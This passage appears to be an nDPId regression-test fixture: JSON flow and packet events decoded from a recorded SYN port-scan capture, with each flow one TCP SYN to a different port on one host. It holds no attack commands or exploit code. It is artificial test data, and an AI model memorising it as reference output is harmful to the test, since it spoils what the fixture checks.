-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":893,"source":"synscan.pcap","alias":"nDPId-test","flow_id":884,"flow_packet_id":1,"flow_last_seen":1278275059851,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059851,"pkt":"ACYLMQczACWzv5HuCABFAAAsiQgAACkGlmqsEAAIQA2GNIzSGuHdUoMYAAAAAGACCAAVrgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":894,"source":"synscan.pcap","alias":"nDPId-test","flow_id":885,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059851,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":34571,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":894,"source":"synscan.pcap","alias":"nDPId-test","flow_id":885,"flow_packet_id":1,"flow_last_seen":1278275059851,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059851,"pkt":"ACYLMQczACWzv5HuCABFAAAsouUAADgGbY2sEAAIQA2GNIzShwvdUoMYAAAAAGACBACtgwAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":895,"source":"synscan.pcap","alias":"nDPId-test","flow_id":886,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059851,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":895,"source":"synscan.pcap","alias":"nDPId-test","flow_id":886,"flow_packet_id":1,"flow_last_seen":1278275059851,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059851,"pkt":"ACYLMQczACWzv5HuCABFAAAs0KgAACYGUcqsEAAIQA2GNIzSAfTdUoMYAAAAAGACDAAqmwAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":896,"source":"synscan.pcap","alias":"nDPId-test","flow_id":887,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059851,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5120,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":896,"source":"synscan.pcap","alias":"nDPId-test","flow_id":887,"flow_packet_id":1,"flow_last_seen":1278275059851,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059851,"pkt":"ACYLMQczACWzv5HuCABFAAAsyxIAADkGRGCsEAAIQA2GNIzSFADdUoMYAAAAAGACCAAcjwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":897,"source":"synscan.pcap","alias":"nDPId-test","flow_id":888,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059851,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":18040,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":897,"source":"synscan.pcap","alias":"nDPId-test","flow_id":888,"flow_packet_id":1,"flow_last_seen":1278275059851,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059851,"pkt":"ACYLMQczACWzv5HuCABFAAAslCcAADIGgkusEAAIQA2GNIzSRnjdUoMYAAAAAGACDADmFgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":898,"source":"synscan.pcap","alias":"nDPId-test","flow_id":889,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059851,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5060,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":898,"source":"synscan.pcap","alias":"nDPId-test","flow_id":889,"flow_packet_id":1,"flow_last_seen":1278275059851,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059851,"pkt":"ACYLMQczACWzv5HuCABFAAAs1vIAADkGOICsEAAIQA2GNIzSE8TdUoMYAAAAAGACCAAcywAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":899,"source":"synscan.pcap","alias":"nDPId-test","flow_id":890,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059851,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3659,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":899,"source":"synscan.pcap","alias":"nDPId-test","flow_id":890,"flow_packet_id":1,"flow_last_seen":1278275059851,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059851,"pkt":"ACYLMQczACWzv5HuCABFAAAsmf0AACUGiXWsEAAIQA2GNIzSDkvdUoMYAAAAAGACCAAiRAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":900,"source":"synscan.pcap","alias":"nDPId-test","flow_id":891,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059852,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1051,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":900,"source":"synscan.pcap","alias":"nDPId-test","flow_id":891,"flow_packet_id":1,"flow_last_seen":1278275059852,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059852,"pkt":"ACYLMQczACWzv5HuCABFAAAss\/0AACsGaXWsEAAIQA2GNIzSBBvdUoMYAAAAAGACEAAkdAAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":901,"source":"synscan.pcap","alias":"nDPId-test","flow_id":892,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059852,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":545,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":901,"source":"synscan.pcap","alias":"nDPId-test","flow_id":892,"flow_packet_id":1,"flow_last_seen":1278275059852,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059852,"pkt":"ACYLMQczACWzv5HuCABFAAAsz\/oAACoGTnisEAAIQA2GNIzSAiHdUoMYAAAAAGACDAAqbgAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":902,"source":"synscan.pcap","alias":"nDPId-test","flow_id":893,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059852,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":902,"source":"synscan.pcap","alias":"nDPId-test","flow_id":893,"flow_packet_id":1,"flow_last_seen":1278275059852,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059852,"pkt":"ACYLMQczACWzv5HuCABFAAAsPSIAACsG4FCsEAAIQA2GNIzSB9TdUoMYAAAAAGACEAAguwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":903,"source":"synscan.pcap","alias":"nDPId-test","flow_id":894,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059852,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":903,"source":"synscan.pcap","alias":"nDPId-test","flow_id":894,"flow_packet_id":1,"flow_last_seen":1278275059852,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059852,"pkt":"ACYLMQczACWzv5HuCABFAAAshZcAADUGjdusEAAIQA2GNIzSA+rdUoMYAAAAAGACCAAspQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":904,"source":"synscan.pcap","alias":"nDPId-test","flow_id":895,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059852,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":904,"source":"synscan.pcap","alias":"nDPId-test","flow_id":895,"flow_packet_id":1,"flow_last_seen":1278275059852,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059852,"pkt":"ACYLMQczACWzv5HuCABFAAAs2oIAADoGM\/CsEAAIQA2GNIzSCindUoMYAAAAAGACDAAiZgAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":905,"source":"synscan.pcap","alias":"nDPId-test","flow_id":896,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059852,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1093,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":905,"source":"synscan.pcap","alias":"nDPId-test","flow_id":896,"flow_packet_id":1,"flow_last_seen":1278275059852,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059852,"pkt":"ACYLMQczACWzv5HuCABFAAAsy1EAACUGWCGsEAAIQA2GNIzSBEXdUoMYAAAAAGACCAAsSgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":906,"source":"synscan.pcap","alias":"nDPId-test","flow_id":897,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059852,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5989,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":906,"source":"synscan.pcap","alias":"nDPId-test","flow_id":897,"flow_packet_id":1,"flow_last_seen":1278275059852,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059852,"pkt":"ACYLMQczACWzv5HuCABFAAAsgekAADsGi4msEAAIQA2GNIzSF2XdUoMYAAAAAGACEAARKgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":907,"source":"synscan.pcap","alias":"nDPId-test","flow_id":898,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059852,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4550,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":907,"source":"synscan.pcap","alias":"nDPId-test","flow_id":898,"flow_packet_id":1,"flow_last_seen":1278275059852,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059852,"pkt":"ACYLMQczACWzv5HuCABFAAAsXasAADMGt8esEAAIQA2GNIzSEcbdUoMYAAAAAGACEAAWyQAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":908,"source":"synscan.pcap","alias":"nDPId-test","flow_id":899,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059895,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7937,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":908,"source":"synscan.pcap","alias":"nDPId-test","flow_id":899,"flow_packet_id":1,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059895,"pkt":"ACYLMQczACWzv5HuCABFAAAsAAgAADkGD2usEAAIQA2GNIzTHwHdU4MZAAAAAGACCAARiwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":909,"source":"synscan.pcap","alias":"nDPId-test","flow_id":900,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059895,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1914,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":909,"source":"synscan.pcap","alias":"nDPId-test","flow_id":900,"flow_packet_id":1,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059895,"pkt":"ACYLMQczACWzv5HuCABFAAAsN1QAACcG6h6sEAAIQA2GNIzTB3rdU4MZAAAAAGACEAAhEgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":910,"source":"synscan.pcap","alias":"nDPId-test","flow_id":901,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059895,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8090,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":910,"source":"synscan.pcap","alias":"nDPId-test","flow_id":901,"flow_packet_id":1,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059895,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/3IAACkGIACsEAAIQA2GNIzTH5rdU4MZAAAAAGACCAAQ8gAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":911,"source":"synscan.pcap","alias":"nDPId-test","flow_id":902,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059895,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":911,"source":"synscan.pcap","alias":"nDPId-test","flow_id":902,"flow_packet_id":1,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059895,"pkt":"ACYLMQczACWzv5HuCABFAAAsWowAADkGtOasEAAIQA2GNIzTA+ndU4MZAAAAAGACCAAsowAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":912,"source":"synscan.pcap","alias":"nDPId-test","flow_id":903,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059895,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":912,"source":"synscan.pcap","alias":"nDPId-test","flow_id":903,"flow_packet_id":1,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059895,"pkt":"ACYLMQczACWzv5HuCABFAAAsPj8AADgG0jOsEAAIQA2GNIzTCDTdU4MZAAAAAGACBAAsWAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":913,"source":"synscan.pcap","alias":"nDPId-test","flow_id":904,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059895,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1521,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":913,"source":"synscan.pcap","alias":"nDPId-test","flow_id":904,"flow_packet_id":1,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059895,"pkt":"ACYLMQczACWzv5HuCABFAAAsHb4AAC0G\/bSsEAAIQA2GNIzTBfHdU4MZAAAAAGACCAAqmwAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":914,"source":"synscan.pcap","alias":"nDPId-test","flow_id":905,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059895,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1082,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":914,"source":"synscan.pcap","alias":"nDPId-test","flow_id":905,"flow_packet_id":1,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059895,"pkt":"ACYLMQczACWzv5HuCABFAAAst4YAADUGW+ysEAAIQA2GNIzTBDrdU4MZAAAAAGACCAAsUgAAAgQFtA=="} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":915,"source":"synscan.pcap","alias":"nDPId-test","flow_id":906,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059895,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":915,"source":"synscan.pcap","alias":"nDPId-test","flow_id":906,"flow_packet_id":1,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059895,"pkt":"ACYLMQczACWzv5HuCABFAAAseH0AACUGqvWsEAAIQA2GNIzTAATdU4MZAAAAAGACCAAwiAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":916,"source":"synscan.pcap","alias":"nDPId-test","flow_id":907,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059895,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2967,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":916,"source":"synscan.pcap","alias":"nDPId-test","flow_id":907,"flow_packet_id":1,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059895,"pkt":"ACYLMQczACWzv5HuCABFAAAs5QAAACYGPXKsEAAIQA2GNIzTC5fdU4MZAAAAAGACDAAg9QAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":917,"source":"synscan.pcap","alias":"nDPId-test","flow_id":908,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059895,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":917,"source":"synscan.pcap","alias":"nDPId-test","flow_id":908,"flow_packet_id":1,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059895,"pkt":"ACYLMQczACWzv5HuCABFAAAsG8IAADcG9bCsEAAIQA2GNIzTH2rdU4MZAAAAAGACEAAJIgAAAgQFtA=="} 